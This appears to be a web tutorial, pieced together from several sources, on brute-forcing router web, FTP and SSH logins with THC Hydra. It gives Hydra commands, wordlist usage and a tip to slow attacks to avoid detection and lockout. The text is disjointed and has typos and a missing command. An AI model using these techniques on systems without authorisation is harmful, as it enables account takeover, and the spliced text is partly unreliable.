Leaving your wireless router at its default settings is a bad idea. The sad thing is, most people still do it. Once they’ve penetrated your network, hackers will change your router settings so they’ll have an easy way back in. This allows them to change your network into a shell or proxy so they can forward their traffic anonymously through you when committing other dirty deeds. If you keep your wireless router at the defaults, then hackers can control your firewalls, what ports are forwarded, and more.
But never mind the hackers, what about your kids?
In this Null Byte, we’re going to take a hack at our own wireless routers to see just how secure they really are. We’ll be using Arch Linux and THC Hydra, a brute-forcing tool. Windows users, you can follow along if you use Cygwin.
Step 1: Download & Install Hydra
First we need to go to the Hydra website, download Hyrda, and get everything configured. In this article, a “cmd” refers to a command that has to be entered into a terminal emulator.
- Download Hydra from THC’s website.
- Extract Hydra in a nice location. cmd: tar zxvf hydra-7.1-src.tar.gz
- Change to the newly made directory.
Step 2: Use Hydra on Your Router
Now we’re going to attack our routers. The default IP/URL to reach it at will be 192.168.1.1, so test that address in a browser to confirm it. If you get a dialog box, you’ve reached your router. This is running HTTP basic authentication.
Commands & Configuration
- cmd: xhydra
- Enter 192.168.1.1 as your target.
- Use http-get as the method.
- Port 80.
- Pick a word list saved on your computer.
Congratulations! See how easy it can be? A router won’t block out requests normally, either. So someone could brute-force you for days upon days. Change your password to something greater than 12 characters and maybe review this guide. Most routers have a default username and password. You can get an overview of all the commands used with Hydra by following: “man hydra” (in terminal).
First, you’ll need to scan the open ports on the router. Use the following command: “namp 192.168.1.1” (this is your router’s IP address). I will use FTP here. Now, run the following command: “hydra -l admin -P password.txt -v -f 192.168.1.1 ftp”
Explanation of the command:
“l” is used for the login username. My default is “admin.” You can use “-L” and give a text file of some usernames if you’re not aware of your router’s admin username. “P” is used for the password list. “v” is used for verbose mode; it shows the login attempts. “f” tells it to quit after getting the valid username and password pair once.
“192.168.1.1” is my router’s configure IP address. “ftp” is the service which I am using to get an open port (you can also use “http-get” and others). Now wait and watch; if it gets a login password pair, then it will show you on the screen. There are many types of services which hydra supports and you can use them for cracking any type of login passwords.
Hydra is popular password cracker which can be used to crack passwords from various services such as http, ftp, telnet etc. Most of our internet is routed through a router which has a http interface. If you are using web browser, try typing 192.168.0.1 or 192.168.1.1 in the web browser and see if the authentication prompt is issues.
If yes, it is prompted most probably from your router. Router web interface is useful to configure port forwarding for torrents or if you want to play multiplayer online games such as AOE etc. If you do not know the password of your router, hacking using hydra can be fun and easy.
For example, if my router web interface is on 192.168.0.1, the simple command will be- Here password.lst is the password list which contains the list of passwords to be bruteforced. admin is the username we will be trying for. The usernames can also be bruteforced with -L option.
Hydra (better known as “thc-hydra”) is an online password attack tool. It brute forces various combinations on live services like telnet, ssh, http, https, smb, snmp, smtp etc. Hydra supports 30+ protocols including their SSL enabled ones. It brute forces on services we specify by using user-lists & wordlists.
Hydra works in 4 modes :
One username & one password
User-list & One password
One username & Password list
User-list & Password list
Pentesters use this tool to test/audit the password complexity of live services mostly where direct sniffing is not possible. You can open xHydra from the Kali linux menu or terminal.
Target – Settings of various target oprions.
Passwords – Specify password options & wordlists.
Tuning – Secify how fast should hydra work. Other timing options are also available.
Specific – For testing on specific targets like a domain, https proxy etc.
Start – Start/Stop & shows the output.
Breaking an ssh with wordlist attack – Hydra
In this lab we try to break an ssh authentication on a remote has who has IP address 192.168.0.103. Here we do a wordlist attack by using a wordlist containing most common passwords to break into the root account.
Step 1: Open thc-hydra
Step 2: Set Target & protocol in the target table
Step 3: Set the username as root & specify the location for a wordlist in passwords tab. Other wide ranges of wordlist ranging up to 3GB or more are available on the internet. Just google for 5 minutes.
Step 4 : Set no of tasks to 1 in tuning tab since this will reduce congestion & chance of detection. But takes longer to complete. This is also necessary to mitigate account lockout duration
Step 5: Start the thc-hydra from Start tab.
Step 6: Scroll Down & Wait until the password gets cracked THC Hydra is easy-to-use, user-friendly tool. Includes a GUI for those that do not know how to work with the cmd. Hydra is ideal for brute force and dictionary password cracks of over 30 different protocols.
Other common remote authentication tools are Medusa and Ncrack. These perform similar functions as THC Hydra and can also be downloaded online. Speed comparisons reveal that all three tools are relatively similar in output times. Hydra top-ranking because of so many supported protocols. THC Hydra is a great option for performing a brute force/dictionary crack of a remote authentication service.